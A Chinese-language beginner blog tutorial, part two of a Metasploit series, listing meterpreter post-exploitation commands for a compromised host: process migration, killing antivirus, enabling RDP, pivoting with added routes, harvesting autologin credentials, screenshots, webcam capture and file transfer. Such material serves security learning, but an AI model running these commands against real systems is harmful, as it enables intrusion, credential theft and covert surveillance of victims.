Metasploit技术初入门02

metasploit的模块主要有五个,辅助模块,漏洞利用模块,攻击载荷模块,后期渗透模块,编码工具模块
在上一篇中我们依次使用了前三个模块,并拿到了一个目标机的shell,接下来就是后期渗透模块的使用了。metasploit主要提供了一个叫meterpreter的后期渗透工具,比较好用。

使用后期渗透模块-工具meterpreter

关于这个meterpreter工具,这里着重提一下。我用的是kali系统自带的metasploit,所以要用meterpreter,我们首先要选择带有该工具的攻击载荷模块,比如这个:
在这里插入图片描述
除此之外,我在接下来使用meterpreter的过程中,有很多命令无法使用,经过百度,得到的答案是版本不支持,收费版的可以正常用,wtf!?所以接下来的命令没有截图,只手打展示。

继续我们的正题,我们已经得到了一个shell,因为这个shell可能不稳定,所以接下来要迁移这个shell,将它和目标机的一个稳定的进程绑定一起。
首先使用ps命令查看目标机已运行的进程,然后用getpid命令查看我们自己的shell的进程号。
命令:
ps 获取目标机正在运行的进程
getpid 查看meterpreter shell的进程号

接下来,进程迁移开始
手动进程迁移命令:migrate xxx(这是你想要迁移到的进程号,不是meterpreter shell的进程号)
迁移完成后,原先meterpreter shell的进程会自动关闭,或者你直接kill命令也行。
自动进程迁移命令:run post/windows/manage/migrate,针对linux系统的命令,你猜会是什么样子,哈哈哈

进程迁移成功后,获得稳定的shell。开始信息收集了。

系统命令

1 搜集系统信息 sysinfo
Metasploit技术初入门02_第1张图片
2 查看目标机是否在虚拟机上 run post/linux(windows就用windows代替)/gather/checkvm
在这里插入图片描述
结果显示是在虚拟机。

3 检查运行时间 idletime
我试了没用。。。。。。。。

4查看目标机完整的网络配置 route
Metasploit技术初入门02_第2张图片
5 查看渗透成功的用户名 getuid
在这里插入图片描述
6 关闭系统杀毒软件 run post/windows/manage/killav
7 开启远程桌面协议,3389端口 run post/windows/manage/enable_rdp
8 开启远程桌面后,查看目标机的本地子网情况 run post/windows/manage/autoroute
9 使用background命令将shell隐藏到后台,然后开始添加路由 route add,添加成功后,route print查看添加情况。现在你就可以用该主机对其他网络进行攻击了。
10 查看该目标机有多少用户登录 run post/windows/gather/enum_logged_on_users
11 查看目标机上安装的应用程序 run post/windows/gather/enum_applications
12 抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin
13 使用 load espia 加载espia插件,screengrab或screenshot抓取目标机屏幕截图
14 其他命令,查看有没有摄像头的命令,webcam_list;有就用webcam_snap命令拍摄一张,或用webcam_stream开启直播模式;也可用shell命令进入目标机shell,用exit退出即可。

文件系统命令

文件命令直接用就好了
1 查看当前处在目标机哪个目录 pwd或getwd
2 查看当前处于本地哪个目录 getlwd
3 列出当前目录中的文件 ls
4 切换目录 cd
5 搜索指定类型文件 search -f *.txt -d c:\ -f代表指定搜素文件模式,-d代表指定哪个目录
6 下载文件 download c:\1.txt/root 下载目标机c盘下的1.txt到攻击机root下
7 上传文件 upload /root/1.txt c:\ 上传攻击机root下1.txt到目标机c盘下
。。。。。。

你可能感兴趣的:(Web安全)